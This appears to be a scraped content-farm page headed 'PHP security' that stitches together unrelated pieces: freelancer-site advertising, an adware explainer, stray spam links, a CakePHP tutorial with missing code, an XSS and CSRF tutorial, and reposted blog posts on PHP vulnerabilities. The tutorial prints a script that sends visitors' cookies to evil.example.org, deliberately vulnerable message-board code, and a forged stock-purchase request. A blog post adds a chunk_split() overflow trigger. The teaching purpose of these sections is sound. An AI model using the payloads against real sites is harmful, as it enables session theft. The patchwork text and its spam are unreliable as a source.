Computer Internet network security News

PHP has come an extended ways since its development in 1994. Since that time, several PHP freelancers have honed their skills to develop dynamic web pages. This has gone beyond the original intent of its name that is personal home page. At initial, this new code was composed of Common Gateway Interface binaries that were written in C programming language. This had the capabilities to interface with databases and utilize many net applications.

A PHP freelance artist is a person that can help design the website you or your company is wanting to develop to draw in the eye and traffic you desire. Looking for a qualified PHP programmer, make sure they work with what’s contemporary and current. The version 5.2.0 and below can still perform, but are no longer supported. 5.2.11 was released on September 16, 2009 and is still supported along with each version up to 5.3.0. This has solved a great deal of bugs and security flaws that were in their set of programming tools. The PHP freelancers that know how to and use version 5.3.1, are working with the latest version of this software. When looking for PHP freelancing experts, this is the version they should be using. This could embrace the ability to fetch articles that are stored within the Mysql database by placing the proper PHP code on each of these articles. The Mysql proprietary source code has been released under the terms of the General Public License however continues to be owned by Sun Microsystems. This technique is used by many of the high profile websites on the web including Facebook, Google, and others.My Sql and PHP freelancers

Outsourcing PHP jobs has become a high demand field that are becoming difficult to fill. As a result of this is dealing with pc codes and languages, little mistakes can cause the desired effect to not occur. A great amount of attention to detail is needed from these PHP freelancers. The use and knowledge of this computer language might have started out as a hobby, but has developed into a highly skilled art form. Because of this, many PHP freelancers are totally focused on this as they develop their craft.

The creators of Globfreelance are themselves experts in the profession of PHP programming. Their website globfreelance.com is one of the few platforms that allow these professionals to make contact with those firms and people that need this kind of work done for them. Outsourcing PHP work has become necessary because of the shortage of these professionals. Because this site is owned and operated by a group of these professionals, this has become the site to find a PHP freelancer.

Explore globfreelance.com today at no cost and spot the quantity and quality of the PHP freelancers that have joined this site. You may never know if this is the outsourcing PHP site for you until you look.Best cheap PHP programmers

Shortcut to important tips about the topic of cheap PlayStation 3 – study the webpage. The time has come when proper info is truly within one click, use this possibility.

PHP security PHP security

Is the term adware new to you? For the technically proficient people, such term may not be entirely new to them. But for those who are intrigued by the term, it is now high time that you brace yourself with the truth behind its name. Adware stands for advertising-supported software. What is this all about then? Adware is in truth any kind of software package that displays, play, or downloads automatically all sorts of advertising materials into the computer either after the installation of such software or during such time when the application is currently being run or used.

How can this be? You might be wondering. Basing on its application procedures, the adware is some kind of software that is either bundled together with another program or is integrated into a particular software. Adware is often used by a programmer because it is a means of recovering the overall programming development costs. Most of the times too, adware permits the use of the program with either no charge at all or at a relatively low price. Thus, the use of the adware continuously motivates the programmer to maintain, write, and upgrade such kind of software product. Some of the existing adwares are likewise sharewares. How does each of them differ in characteristics and use? Adware is primarily oriented to be advertising supported. The users of the software are also offered choices of whether or not to pay for the licensed or registered copies so as to do away with all those popping up advertisements.

Apart from all these, the existence of the adware is held up in controversy. Why so? It is because the adware is a software which is a disguised as a type of spyware. The adware vehemently tracks, reports, and usually resells the particular information about a user and his activities without his slightest knowing. Oftentimes, adware is also a malware. Meaning, it is able to interrupt with the rest of the computer software applications in use so as to force the computer users to visit the advertised website. Adware, spyware, and malware are the terms which may be misconstrued for one another. The shortest explanation to this confusion is when the user gets to install adware on one particular computer and then is geared towards activating it for a tracking tool; then, the adware now becomes a spyware. Meaning, when another user comes to use that certain computer, his activities get tracked by the adware without him knowing it.

Adware removal is done by employing certain programs that will detect, then quarantine, and totally remove the adware as well as its being a spyware. Some of the best adware removal applications include Lavasoft’s Adware, BulletProofSoft’s BPS Spyware Adware, Sunbelt Software’s CounterSpy, Patrick Kolla’s Spybot Search and Destroy, Intermute’s SpySubtract, Webroot’s SpySweeper, and PCTool’s Spyware Doctor. These adware removal applications are devised to detect the spyware present in the system and also to stop them from producing viruses that will harm the computer system. Aside from using these adware removal software, there are likewise several modes to prevent its attack on your system. For one, activate the general security especially when you are browsing the Internet. Also, keep an updated Windows Update, make use of an alternative browser, and install the ad-blocking software. You can always protect yourself if only you know how.

Distributed by:
download vince delmonte
download vince delmonte

For useful advice about order pay per click formula 2 – give a look to quoted publication.

PHP security

As more and more people online are creating their first website they find that the idea of using PHP codes a little challenging. HTML is so much easier to understand but it can only do so much. PHP scripts can help you make your website more user friendly. This also cuts down the time you need to manage your site. But you may feel like you are going to have to have someone else build that site for you. But the is another way. You can learn it for yourself.

Take a look at your web hosting account. You see that you have the ability to use PHP language on your website so why not use it. You do not have to build your site purely from PHP codes. Most website are built from a combination of HTML and PHP. All you need is a tutorial to help walk you through the set up. You will find that PHP codes look similar to Javascript codes. With a few PHP scripts you can have a site that collect important info, or sends visitors to pages that are password protected, even perform calculations and more. Now how much time would this cut off your work load?

Sure, their is nothing wrong with having a HTML website but as the internet keeps changing it will be nice to know that you can evolve with it. PHP is not something to mess around with if you do not know what you are doing. It can be hard to find the mistakes unless you know what the codes mean. But when it is done right you will have a website that rivals your competitors.

With all this talk about PHP script you may be wondering what is PHP in the first place. well it stands for “Hypertext Preprocessor” was known as “Personal Home Page” and it can be used on pretty much all types of servers. Created by Rasmus Lerdorf in 1995 to develope dynamic web pages. Now millions of webmasters have learned and created websites with this language. There is no reason why you can’t do the same.

MYsql database is commonly used with with PHP once the date feed is set up. You will find it quite useful as you create your website or update it. Don’t worry about not knowing what MYsql database is right now because you can learn that too. The codes give you a clean look and feel plus by being able to perform certain functions on it you make see more return visitors using your site.

So as you can see you do not have to be afraid of using PHP on your website. You can find simple PHP tutorials that can real help you learn how to us it. You will like what you will be able to with your new website.

This is your time to start learning more about how you can have a better understanding of PHP then please visit PHP tutorials. If you would like to use your website to start a business then check out supplemental income.

Access competent experiences about buy PlayStation 3 – welcome to your individual knowledge pack.

PHP security

View full article here: Drag and drop category management with CakePHP and Jquery our visit our blog today at EndYourIf.com

Today’s article is going to walk you through creating a slick drag and drop with AJAX category management system.
CakePHP offers a really nice built-in tree management. In fact, at a bare minimum you simply need to create a table with 2 extra columns, tell your model to act like a “tree” and rather than doing a find(’all’) you do a generatetreelist() or a find(’threaded’) and CakePHP takes care of the rest.

After doing a quick test, I was quite impressed with what CakePHP did for me, but I was not satisified. I wanted to create a really slick category management system that I can re-use and show off. Well, in this tutorial I go about 90% of the way. The only thing I didn’t have time to finish was, rather than redrawing my tree through AJAX, use DHTML and dynamically update my tree after dragging and dropping. Don’t worry, I plan to finish this with a part two soon.

I know it’s not the most beautiful system in the word. But, I hope it drives the point home of how much potential there is with this system. To create all of the code below and do a bit of testing, it took about 3 hours total! A normal category management system of unlimited sub categories would probably take me a couple of days AND there is no way it could match the “coolness” factor of this application.

Also, in case the screen shots are not quite clear. To create a new category, type the name in the text box and drag the red rectangle above to where you want to place it. The category it will be placed in will be highlighted in yellow. If you wish to move a category or entire branch, simply drag it and move it to the new category.

Ok, let’s move on to the actual code. The first thing to do is create our categories table:

Code
CREATE TABLE `categories` ( `id` int(10) unsigned NOT NULL auto_increment, `name` varchar(255) NOT NULL, `parent_id` int(10) unsigned NOT NULL, `lft` int(10) unsigned NOT NULL, `rght` int(10) unsigned NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB DEFAULT CHARSET=latin1;If you’ve ever built a category system, the first three columns should look familiar. The key columns here though are the fourth and fifth columns, the lft and rght. CakePHP automatically deals with these columns for us whenever we save or delete data. For a detailed explaination, view this document from Mysql: http://dev.mysql.com/tech-resources/articles/hierarchical-data.html

Now that our table is created, the next thing I did was bake my model, controller, and views. After I baked all three, I had to update and remove a few things. First off our model, the simplest part of the process:

Code
As I mentioned before, the only thing special to note here is the “actAs” is set to “tree”. Next up is our controller, it’s also quite basic:

Code

PHP security

The media has helped make cross-site scripting (XSS) a familiar term,

and the attention is deserved. It is one of the most common security

vulnerabilities in web applications, and many popular open source PHP

applications suffer from constant XSS vulnerabilities.

XSS attacks have the following characteristics:

• Exploit the trust a user has for a particular site.Users don’t necessarily
• have a high level of trust for any web site, but the browser does.
• For example, when the browser sends cookies in a request, it is t
• rusting the web site. Users may also have different browsing habits
• or even different levels of security defined in their browser depending
• on which site they are visiting.
• Generally involve web sites that display external data.Applications at a
• heightened risk include forums, web mail clients, and anything that displays syndicated content (such as RSS feeds).
• Inject content of the attacker’s choosing.When external data is not properly filtered, you might display content of the attacker’s choosing. This is just as dangerous as letting the attacker edit your source on the server.

How can this happen? If you display content that comes from any external

source without properly filtering it, you are vulnerable to XSS. Foreign data isn’t

limited to data that comes from the client. It also means email displayed in a web

mail client, a banner advertisement, a syndicated blog, and the like. Any information

that is not already in the code comes from an external source, and this generally means that most data is external data.

Consider the following example of a simplistic message board:

<form>
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

if (isset($_GET['message']))
{
    $fp = fopen('./messages.txt', 'a');
    fwrite($fp, "{$_GET['message']}<br />");
    fclose($fp);
}

readfile('./messages.txt');

?>

This message board appends <br /> to whatever the user enters, appends this to a file, then displays the current contents of the file.

Imagine if a user enters the following message:

<script>
document.location = 'http://evil.example.org/steal_cookies.php?cookies=' +

document.cookie
</script>

The next user who visits this message board with JavaScript enabled is redirected to evil.example.org, and any cookies associated with the current site are included in the query string of the URL.

Of course, a real attacker wouldn’t be limited by my lack of creativity or JavaScript expertise. Feel free to suggest better (more malicious?) examples.

What can you do? XSS is actually very easy to defend against. Where things get difficult is when you want to allow some HTML or client-side scripts to be provided by external sources (such as other users) and ultimately displayed, but even these situations aren’t terribly difficult to handle. The following best practices can mitigate the risk of XSS:

• Filter all external data.As mentioned earlier, data filtering is the most important practice you can adopt. By validating all external data as it enters and exits your application, you will mitigate a majority of XSS concerns.
• Use existing functions.Let PHP help with your filtering logic. Functions like htmlentities(), strip_tags(), and utf8_decode() can be useful. Try to avoid reproducing something that a PHP function already does. Not only is the PHP function much faster, but it is also more tested and less likely to contain errors that yield vulnerabilities.
• Use a whitelist approach.Assume data is invalid until it can be proven valid. This involves verifying the length and also ensuring that only valid characters are allowed. For example, if the user is supplying a last name, you might begin by only allowing alphabetic characters and spaces. Err on the side of caution. While the names O'Reilly and Berners-Lee will be considered invalid, this is easily fixed by adding two more characters to the whitelist. It is better to deny valid data than to accept malicious data.
• Use a strict naming convention.As mentioned earlier, a naming convention can help developers easily distinguish between filtered and unfiltered data. It is important to make things as easy and clear for developers as possible. A lack of clarity yields confusion, and this breeds vulnerabilities.

A much safer version of the simple message board mentioned earlier is as follows:

<form>
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

if (isset($_GET['message']))
{
    $message = htmlentities($_GET['message']);

    $fp = fopen('./messages.txt', 'a');
    fwrite($fp, "$message<br />");
    fclose($fp);
}

readfile('./messages.txt');

?>

With the simple addition of htmlentities(), the message board is now much safer. It should not be considered completely secure, but this is probably the easiest step you can take to provide an adequate level of protection. Of course, it is highly recommended that you follow all of the best practices that have been discussed.

PHP security Computer-security, cross-site, PHP security, PHP-security, scripting, xss

Despite the similarities in name, cross-site request forgeries (CSRF) are an almost opposite style of attack. Whereas XSS attacks exploit the trust a user has in a web site, CSRF attacks exploit the trust a web site has in a user. CSRF attacks are more dangerous, less popular (which means fewer resources for developers), and more difficult to defend against than XSS attacks.

CSRF attacks have the following characteristics:

• Exploit the trust that a site has for a particular user.

  Many users may not be trusted, but it is common for web applications to offer users certain privileges upon logging in to the application. Users with these heightened privileges are potential victims (unknowing accomplices, in fact).

• Generally involve web sites that rely on the identity of the users. It is typical for the identity of a user to carry a lot of weight. With a secure session management mechanism, which is a challenge in itself, CSRF attacks can still be successful. In fact, it is in these types of environments where CSRF attacks are most potent.
• Perform HTTP requests of the attacker’s choosing.

  CSRF attacks include all attacks that involve the attacker forging an HTTP request from another user (in essence, tricking a user into sending an HTTP request on the attacker’s behalf). There are a few different techniques that can be used to accomplish this, and I will show some examples of one specific technique.

Because CSRF attacks involve the forging of HTTP requests, it is important to first gain a basic level of familiarity with HTTP.

A web browser is an HTTP client, and a web server is an HTTP server. Clients initiate a transaction by sending a request, and the server completes the transaction by sending a response. A typical HTTP request is as follows:

GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*

The first line is called the request line, and it contains the request method, request URL (a relative URL is used), and HTTP version. The other lines are HTTP headers, and each header name is followed by a colon, a space, and the value.

You might be familiar with accessing this information in PHP. For example, the following code can be used to rebuild this particular HTTP request in a string:

<?php

$request = '';
$request .= "{$_SERVER['REQUEST_METHOD']} ";
$request .= "{$_SERVER['REQUEST_URI']} ";
$request .= "{$_SERVER['SERVER_PROTOCOL']}\r\n";
$request .= "Host: {$_SERVER['HTTP_HOST']}\r\n";
$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";
$request .= "Accept: {$_SERVER['HTTP_ACCEPT']}\r\n\r\n";

?>

An example response to the previous request is as follows:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 57

<html>
<img src="http://example.org/image.png" />
</html>

The content of a response is what you see when you view source in a browser. The img tag in this particular response alerts the browser to the fact that another resource (an image) is necessary to properly render the page. The browser requests this resource as it would any other, and the following is an example of such a request:

GET /image.png HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*

This is worthy of attention. The browser requests the URL specified in the src attribute of the img tag just as if the user had manually navigated there. The browser has no way to specifically indicate that it expects an image.

Combine this with what you’ve learned about forms, and then consider a URL similar to the following:

http://stocks.example.org/buy.php?symbol=SCOX&quantity=1000

A form submission that uses the GET method can potentially be indistinguishable from an image request – both could be requests for the same URL. If register_globals is enabled, the method of the form isn’t even important (unless the developer still uses $_POST and the like). Hopefully the dangers are already becoming clear.

Another characteristic that makes CSRF so powerful is that any cookies pertaining to a URL are included in the request for that URL. A user who has an established relationship with stocks.example.org (such as being logged in) can potentially buy 1000 shares of SCOX by visiting a page with an img tag that specifies the URL in the previous example.

Consider the following form located (hypothetically) at http://stocks.example.org/form.html:

<p>Buy Stocks Instantly!</p>
<form action="/buy.php">
<p>Symbol: <input type="text" name="symbol" /></p>
<p>Quantity:<input type="text" name="quantity" /></p>
<input type="submit" />
</form>

If the user enters SCOX for the symbol, 1000 as the quantity, and submits the form, the request that is sent by the browser is similar to the following:

GET /buy.php?symbol=SCOX&quantity=1000 HTTP/1.1
Host: stocks.example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234

I include a Cookie header in this example to illustrate the application using a cookie for the session identifier. If an img tag references the same URL, the same cookie will be sent in the request for that URL, and the server processing the request will be unable to distinguish this from an actual order.

There are a few things you can do to protect your applications against CSRF:

• Use POST rather than GET in forms. Specify POST in the method attribute of your forms. Of course, this isn’t appropriate for all of your forms, but it is appropriate when a form is performing an action, such as buying stocks. In fact, the HTTP specification requires that GET be considered safe.
• Use $_POST rather than rely on register_globals. Using the POST method for form submissions is useless if you rely on register_globals and reference form variables like $symbol and $quantity. It is also useless if you use $_REQUEST.
• Do not focus on convenience.

  While it seems desirable to make a user’s experience as convenient as possible, too much convenience can have serious consequences. While “one-click” approaches can be made very secure, a simple implementation is likely to be vulnerable to CSRF.

• Force the use of your own forms.

  The biggest problem with CSRF is having requests that look like form submissions but aren’t. If a user has not requested the page with the form, should you assume a request that looks like a submission of that form to be legitimate and intended?

Now we can write an even more secure message board:

<?php

$token = md5(time());

$fp = fopen('./tokens.txt', 'a');
fwrite($fp, "$token\n");
fclose($fp);

?>

<form method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

$tokens = file('./tokens.txt');

if (in_array($_POST['token'], $tokens))
{
    if (isset($_POST['message']))
    {
        $message = htmlentities($_POST['message']);

        $fp = fopen('./messages.txt', 'a');
        fwrite($fp, "$message<br />");
        fclose($fp);
    }
}

readfile('./messages.txt');

?>

This message board still has a few security vulnerabilities. Can you spot them?

Time is extremely predictable. Using the MD5 digest of a timestamp is a poor excuse for a random number. Better functions include uniqid() and rand().

More importantly, it is trivial for an attacker to obtain a valid token. By simply visiting this page, a valid token is generated and included in the source. With a valid token, the attack is as simple as before the token requirement was added.

Here is an improved message board:

<?php

session_start();

if (isset($_POST['message']))
{
if (isset($_SESSION['token']) && $_POST['token'] == $_SESSION['token'])
    {
        $message = htmlentities($_POST['message']);

        $fp = fopen('./messages.txt', 'a');
        fwrite($fp, "$message<br />");
        fclose($fp);
    }
}

$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;

?>

<form method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

readfile('./messages.txt');

?>

PHP security Computer security programming, Computer-security, cross-site, forgeries, PHP security, PHP-security

If you are one of the guys that read the PHP CVS commits you usually know about the security bugs months before the rest of the community and this is no news for you. During the last 24h the following fix was merged into the PHP CVS.
Corrected fix for CVE-2007-2872
This fixes the chunk_split() overflow that was according to the PHP 5.2.3 release notes already fixed. The original fix was however not only broken but complete nonsense. If you can read C you will see that the integer overflow was not fixed in PHP 5.2.3 but simply moved into a separate line and an additional bogus if clause was added.
You can test this yourself with the following code:
<?php $a=str_repeat("A", 65537); $b=1; $c=str_repeat("A", 65537); chunk_split($a,$b,$c);?>

So my recent posting that was called marketing FUD is even more true.
PS: I wonder if SEC-CONSULT was the one that reported that the fix is no fix at all or if it was one of the linux distributors. The linux distributors and their regression tests that are always a good way to check if bugs are fixed correctly.

Popularity: unranked [?]

Read more at blog-admin@nopiracy.de (Stefan Esser)

PHP security PHP security

Brought to you from one of the comments in my blog.
Google for "Stefan Esser" and get a sponsored link for Zend.
http://www.google.com/search?q=%22Stefan+Esser%22

Popularity: unranked [?]

Read more at blog-admin@nopiracy.de (Stefan Esser)

PHP security PHP security

PHP 5.2.3 was released with several security fixes.
Again not all security fixes are mentioned in the release announcement.
Again security bugs known to the developers were not correctly fixed.
More info here.
PS: Why does PHP.net always release security fixes just before the weekend?

PHP Releases have historically been packaged and tagged on Wednesday, and released on Thursday. This release is no different.

As far as the session_id() issue you did report it and even participated in the discussion regarding the problem with both Stas and I. As I am sure you know the patch to address the remote exploit of the problem via PATH_INFO was applied on May 15th. If you knew the problem was still there, it would’ve taken just a 2-3 line e-mail to security@php.net to identify that. For whatever reason you did not, so while the security team is at fault at not looking at the issue deeper, you must admit there was plenty of time to identify the error prior to the release.

PHP security new-php, PHP security

Because the PHP developers do not want to fix the PHP 4 Reference Counter Overflow Vulnerability that was disclosed during the Month of PHP Bugs the Hardened-PHP Project as usual had to step in to protect the users of PHP.
I created a patch for the refcount overflow problem that took about 30 minutes to develop and that fixes the problem without breaking binary compatibility. Something that is according to claims of Zend Engine developer and Zend employee Stanislav Malyshev not possible at the moment. You can apply it directly or wait until it was ripped and merged into the default PHP CVS after it was relabled as the work of the PHP developers.

Read more at blog-admin@nopiracy.de (Stefan Esser)

PHP security PHP security

I just released Suhosin 0.9.20 that adds a few new features and bugfixes. The most important addition is that a mutex is placed around the call to the system’s crypt() function to ensure thread safety. This mutex is necessary to close a bunch of possible attacks on the libc crypt() function on multi threaded systems.
Because the libc crypt() function (and also the PHP port for windows) is not thread safe there exists a race condition that can be exploited on multi threaded systems. When for example two threads are trying to validate passwords through crypt() at the same time they are using the same internal memory area which can result in both crypt() actions returning invalid results or the result of the one operation can overwrite the result of the other. It is obvious that in this case a thread using a wrong password will return the correct crypted password if during the same time another thread calls crypt() on the correct password. In this case the application will usually login the user that used the wrong password. (However the thread race is hard to win from remote)

Because Suhosin changes the default crypt() method to the blowfish implementation it comes with, which is thread safe by default Suhosin users were safe from this vulnerability before this update, unless they provided their own salt when they called crypt().
Note: In PHP 5.2.1 the PHP developers silently closed that hole for UNIX systems that support crypt_r(). It is however very likely that they did not realise the security implications, because they have no protection for systems that do not have crypt_r(), they did not merge it to PHP 4 and they also did not fix the windows implementation.

Read more at blog-admin@nopiracy.de (Stefan Esser)

PHP security PHP security

When you read the OWASP risk evaluation standard carefully you might get as confused as I got. They estimate the risk by first estimating the likelihood and then estimating the technical and business impact. The estimation is done by assigning the numbers 0..9 to a number of factors.
So far so good. Most of it makes perfect sense, but I was a little bit confused about the following factor:

Opportunity

What resources and opportunity are required for this group of
attackers to find and exploit this vulnerability? No access or special
resources (0), limited access and resources (4), special access or
resources (7), full access or expensive resources (9)

According to this factor the likelihood of an attack increases when more access to the application and more expensive resources are required on the attacker’s side. I dare to doubt that

Read more at blog-admin@nopiracy.de (Stefan Esser)

PHP security PHP security